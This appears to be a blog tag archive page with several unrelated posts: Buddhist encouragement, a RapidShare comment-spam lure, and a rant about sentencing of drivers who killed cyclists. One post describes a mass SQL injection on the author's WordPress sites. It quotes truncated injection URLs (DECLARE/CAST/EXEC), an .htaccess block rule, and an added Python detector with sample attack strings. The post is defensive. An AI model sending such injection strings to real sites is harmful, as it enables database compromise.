Tag Archive: HURRY

Peace, Culture, Education

—- DAILY ENCOURAGEMENT —-

“Of course, you’re free to live your lives how you like, but don’t forget the fundamental path of life.

“The Soka Gakkai teaches us this fundamental path–a path for accumulating good fortune, helping others, and working for peace. That’s why we now have so many members around the world, and why our numbers continue to grow steadily. Support and praise for our movement promoting peace, culture, and education is spreading across the globe, transcending all boundaries and divisions.

“Nichiren Daishonin expounded his teaching for the eternal future. There’s no need for us to rush or hurry. All the pieces are in place. The tide of history is moving in the direction of humanism. With profound conviction in this truth, please advance with a calm, relaxed, and broad-minded attitude.”

These are Daisaku Ikeda’s words of encouragement for today, Monday, March 1st, 2010.  Fantastic!


Rapidshare WordPress Comment Spam

I got an unusual (for me) comment spam this morning at 01:58 from a Kuala Lumpur spammer.  His modus operandi is to trawl WordPress blogs looking for the word “RapidShare” and then dump a deliberately malformed warez-type URL to a zip file promising unlimited super-fast Rapidshare accounts that have been compromised.

I had such a posting quite a while ago here, view-of-local-network-from-rapidshare-a-black-hole, so I’ll be letting the comment through because it’s got no active backlinks and such like.

RapidShare

It’s a file sharing website where users can share files of their own creation or where there isn’t a valid copyright. In the real world, of course, I guess about 99% of it is cracked software and copyright video and music. Some of it is my own and others under the Crawling Chaos moniker.  Bizarrely, you can actually pay a premium if you want better downloads of the ‘free’ stuff in the “premium” service.  But that’s the point, isn’t it?  ;-)

Comment Spammer

And this is where the spammer comes in. The comment and malformed URL is this;

Hey guy's! Check it out.HURRY!
JUST DONT CHANGE THE PASSWORD COZ EVERYBODY ALSO USING IT . Enjoyyyy.

h t t p://rapidshare.com/files/203145031/Rapidshare_Premium_Accounts_-_Latest_Issue.zip

Content

I checked the zip.  There’s a lot of Spanish and English in some text files as word docs in both old and new formats as well as plain text files.  There’s also an MP3 file.  In my sandbox they checked as clean!!  I haven’t gone any deeper into testing the passwords as Rapidshare, while being good in principle, is actually theft and deception in practice.

The spammer’s email checks out in a few on-line mobile phone sales on a Malaysian website. It’s [email protected] but it’s probably spoofed.  With so much secrecy and nefarious activity on the web, who’s to say?

I don’t see it as a benevolent gesture of a thief in a theft based culture.  I see it more as a tester for a bigger plan.  Maybe, send a few of these ‘tasters’ out for a bit before the true malevolence is delivered?  Maybe the dodgy content is in the particular RapidShare accounts that have been compromised or deliberately set up with this purpose in mind?

You’ve been warned!


Too Much Snow, Too Much White, my eyes, my eyes.

There is a saying of the Buddhist monk Nichiren Daishonin, that

Winter Always Turns to Spring

Those who believe in the Lotus Sutra are as if in winter, but winter always turns to spring. Never, from ancient times on, has anyone heard or seen of winter turning back to autumn. Nor have we ever heard of a believer in the Lotus Sutra who turned into an ordinary person. The sutra reads, “If there are those who hear the Law, then not a one will fail to attain Buddhahood.”

Well I just wish that it’d hurry up because after my recent travels, I’m getting rather fed up with white.  Even though we all know that white is made from all colours as Newton proved with his prisms experiment, I’d just like the opportunity to see some of them some time in the near future!

Austrian Trip Photos

 


Probable DDOS attack Using SQL Injection on my Websites

Over the last day, my sites have been really slow and twice to my knowledge have tripped out.  I’ve been getting a mysql error message like so when I try to resolve the problem in phpAdmin;

MySQL: ERROR 1040: Too many connections

I tried hosting chat support (as I’m in a hurry) but the connection kept dropping.  During this process Google came to the fore and pushed me down several avenues of investigation.

This was one result, http://rackerhacker.com/2008/06/24/mysql-error-1040-too-many-connections/ from the web, and another from the horse’s mouth http://dev.mysql.com/doc/refman/5.0/en/too-many-connections.html

I then proceeded to check my WordPress plugins but couldn’t because the server wasn’t responding.  When it finally fired back up after quarter of an hour (!), I immediately disabled some OpenID plugins I’ve been playing with on one site and checked my databases were okay.

They were, but during the process I noticed that Wassup was the biggest table – unusually so.  Looking at some of the references in an extended list in the GUI, I noticed that several (random, as far as I could tell), post addresses were extre-e-e-e-e-mely long, terminating in some form of code.  Like so (It’s manually wrapped to fit into my theme);

http://strangelyperfect.tv/68/70s-mixer/?;[email protected]%20

CHAR(4000);[email protected]=CAST(0x…%20AS%20CHAR(4000));EXEC(@S);  (addendum: clickable link removed as I’m using this plugin now)

If you copy & paste and try the link it won’t work now (read on for later ;-) ) but the correct link here does;

http://strangelyperfect.tv/68/70s-mixer/

Before my fix, the first link took the user to the correct page and it displayed in the browser address bar with the long link.  My suspicions were now being raised because the page displayed okay.  This must be all the WordPress updating I’ve done.  It was a couple of updates back that the thing had some SQL Injection resistance built in.  It appears to fall over gracefully by ignoring duff requests.

So I chucked the “extra” part of the link into Google like so.   There are over 6k hits.

These posts got me thinking:

http://www.unsoughtinput.com/index.php/2006/11/09/comment-spam-deluge-did-our-captcha-get-hacked/

http://treyford.wordpress.com/2008/04/30/scary-mass-sql-attack/

http://www.thejoyofcode.com/Stop_trying_to_hack_me.aspx

and a neat fix that I’ve implemented I found here.

http://www.ravenphpscripts.com/postp122652.html (link removed as they’ve gone a bit funny all of a sudden)

What I’ve done is added the suggested code to my .htaccess file, like so:

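# Added, protect from SQL Injection (sourced from) http://www.ravenphpscripts.com/postp122652.html
RewriteEngine On
# Match a query string containing DECLARE, one or more %20 (encoded space), then @ (case-insensitive)
RewriteCond %{QUERY_STRING} ^.+DECLARE(%20)+@ [NC]
# Leave the URL unchanged (-), answer 403 Forbidden (F) and stop processing rules (L)
RewriteRule ^.* - [F,L]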

This has done the trick.  Anything banging into my site with that in the string, is rejected.  I haven’t implemented a polite screen.  It just gets the standard response from my host as you’d have found with the first of my links above.

It’ll probably need twiddling in future but it’s okay for now.
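An added example (not from the original post or the linked fix): a small Python check that could be run over logged request URLs, such as those a stats table records, to flag this query-string pattern after decoding and to show whether the .htaccess condition above would have refused each one. The URLs, the example.test host and the short hex value are constructed, and the function names are hypothetical.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# The page's .htaccess condition, applied to the raw (still-encoded) query string.
HTACCESS_RULE = re.compile(r"^.+DECLARE(%20)+@", re.I)
# Signature checked after decoding: DECLARE @var ... CAST(0x<hex> AS type ... EXEC(
SIGNATURE = re.compile(
    r"DECLARE\s+@\w+.*?CAST\s*\(\s*0x([0-9a-f]+)\s+AS\s+\w+.*?EXEC\s*\(",
    re.I | re.S)

def decode_fully(text, max_rounds=3):
    """Percent-decode repeatedly so double-encoded input is normalised."""
    for _ in range(max_rounds):
        decoded = unquote_plus(text)
        if decoded == text:
            break
        text = decoded
    return text

def inspect_url(url):
    """Return (suspicious, hex_payload_bytes, blocked_by_htaccess_rule)."""
    query = urlsplit(url).query
    match = SIGNATURE.search(decode_fully(query))
    payload_bytes = len(match.group(1)) // 2 if match else 0
    return (match is not None, payload_bytes, bool(HTACCESS_RULE.search(query)))

# Constructed sample URLs; the host and the 4-byte hex value are placeholders.
SAMPLE_URLS = [
    "http://example.test/68/some-post/",
    "http://example.test/?s=declare+your+interest",
    "http://example.test/68/some-post/?;DECLARE%20@S%20CHAR(4000);SET%20@S="
    "CAST(0x41424344%20AS%20CHAR(4000));EXEC(@S);",
    "http://example.test/68/some-post/?;declare+@s+char(4000);set+@s="
    "cast(0x41424344+as+char(4000));exec(@s);",
]

def report(urls):
    """Map each URL to its inspection result for review."""
    return {url: inspect_url(url) for url in urls}

if __name__ == "__main__":
    for url, (bad, size, blocked) in report(SAMPLE_URLS).items():
        print(f"suspicious={bad!s:5} bytes={size:<4} rule_blocks={blocked!s:5} {url[:60]}")
```

The last sample is flagged by the decoded signature but not by the rewrite condition, because the condition only matches spaces written as %20 in the raw query string.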

Another similar link was:

http://strangelyperfect.tv/287/finally-a-bit-more-on-the-air-powered-car-from-guy-negre/

/?;[email protected]%20CHAR(4000);[email protected]=CAST(0x…%20AS%20CHAR(4000));EXEC(@S);

which should point to:

http://strangelyperfect.tv/287/finally-a-bit-more-on-the-air-powered-car-from-guy-negre/

This was especially troublesome as the post title was long anyway so it looked in the browser address bar that everything was okay!


People Are Mad, Not Cyclists; Extra Information #2

Following on from these two previous posts where I mentioned the laughable penalties for killing someone who happens to be riding a bike and the weasely excuses, I hate to say that it’s another case of

I told you so…

£500 fine and 6 month ban for killing someone…

Family attacks cyclist crash fine

This was the BBC headline covering the fact that van driver Robert McTaggart, 36, managed to persuade the court that he “didn’t see” the cyclist.

This was no ordinary cyclist either.  This was a record holder with a very good chance of winning a medal at the Olympic games starting today…  He was Jason MacIntyre.

  • Now Jason, being a professional cyclist, would have had a lot of experience falling off and being hurt in his highly competitive sport, and also, would be used to avoiding collisions.
  • To do his sport at that level he would have to do a horrendous amount of training, much of it on public roads.

This is what was said in the van driver McTaggart’s defence;

The cyclist collided with the truck as it turned in to a junction across the carriageway, the court heard.

Defence solicitor Craig Wood said McTaggart had considered himself a “competent, prudent and careful driver” and added:

“My client simply did not see Mr MacIntyre coming. As a result, the cycle went into the rear of the vehicle and he was tragically killed.”

Now I’m trying to work that one out and the only conclusion I can reach, as it’s happened to me countless times, is that McTaggart overtook MacIntyre on his bike, slammed the brakes on and tried to do a left turn directly in front of the bike, totally misjudging the bike’s speed..

That’s the only way the bike could hit the rear of a moving vehicle.

Weasely McTaggart (“competent, prudent and careful driver” claimed his solicitor), said he “thought” that MacIntyre was “probably” on the cycle path..  These are not the words of someone who is competent, careful or prudent.  These are the weasel words of someone in a hurry who misjudged everything.

How?

  • A following witness (driver), said the bike was doing about 30mph (MacIntyre was a record holder you know), and another witness said that they’d slowed down as had McTaggart, having seen the cyclist for a full 16 seconds! Even the police said this…
  • So a witness saw McTaggart slow down for the bike and therefore, McTaggart did see the bicycle.
  • Also, I’ve tried to cycle at 30mph on our local cycle paths – it’s worse than dangerous; see my past postings.  I seriously doubt an athlete in training would use cycle paths because of the danger, inconvenience at maintaining a good pace, roughness, glass and obstacles.

So I’m in total agreement with the obviously upset family of MacIntyre who quite naturally, and accurately in my opinion, wanted Robert McTaggart prosecuted on charges of culpable homicide, or causing death by dangerous driving.  Despite being upset, MacIntyre’s dad, David said,

“We are of the view that McTaggart should have been facing charges of culpable homicide or causing death by dangerous driving.”

He claimed that the local procurator-fiscal recommended dangerous driving charges but that the Crown Office downgraded the charge to careless driving, despite an appeal from the family.

“The Crown Office view is that this standard of driving falls below normal standards. We are of the view that this standard of driving falls far below normal standards and is deserving of a more serious charge.”

He refused to accept that to drive along a road unaware of oncoming traffic for 16 seconds, to cross in front of oncoming traffic thereby causing death, amounted only to careless driving. That the Crown Office did, he said, “was a terrifying indictment on our society”. – quoted from The Herald.

500 quid….  And on the same day, is another.

Quoting directly from The Herald again, here,

41-year-old firefighter Garry Trotter, who was “solely to blame” for a crash which killed 51-year-old deaf driver John McIntosh, was allowed to keep his licence by a sheriff.

Trotter, who had been driving a fire tender to an emergency call in Bo’ness, West Lothian, was originally charged with causing death by dangerous driving. However, he was convicted of a reduced charge of driving carelessly, over the speed limit, failing to give way and driving through a red light. He was fined £750 and had his licence endorsed with six penalty points.

It was apparently an emergency, but you know, now there’s another.  Suppose the ambulance speeding to help Mr McIntosh knocked someone else over….

….and so it goes on.  Someone must take responsibility for this shit instead of continually looking for get-outs.

Links:

flying-highlander-dies-on-tragic-a82

http://news.scotsman.com

http://www.timesonline.co.uk

http://www.heraldscotland.com/

http://news.stv.tv/

http://www.bikeradar.com/

http://www.heraldscotland.com/news/news/display.var.2420753.0.Anger_over_delay_to_new_road_death_law_as_two_avoid_jail.php


© 2007-2017 Strangely Perfect All Rights Reserved -- Copyright notice by me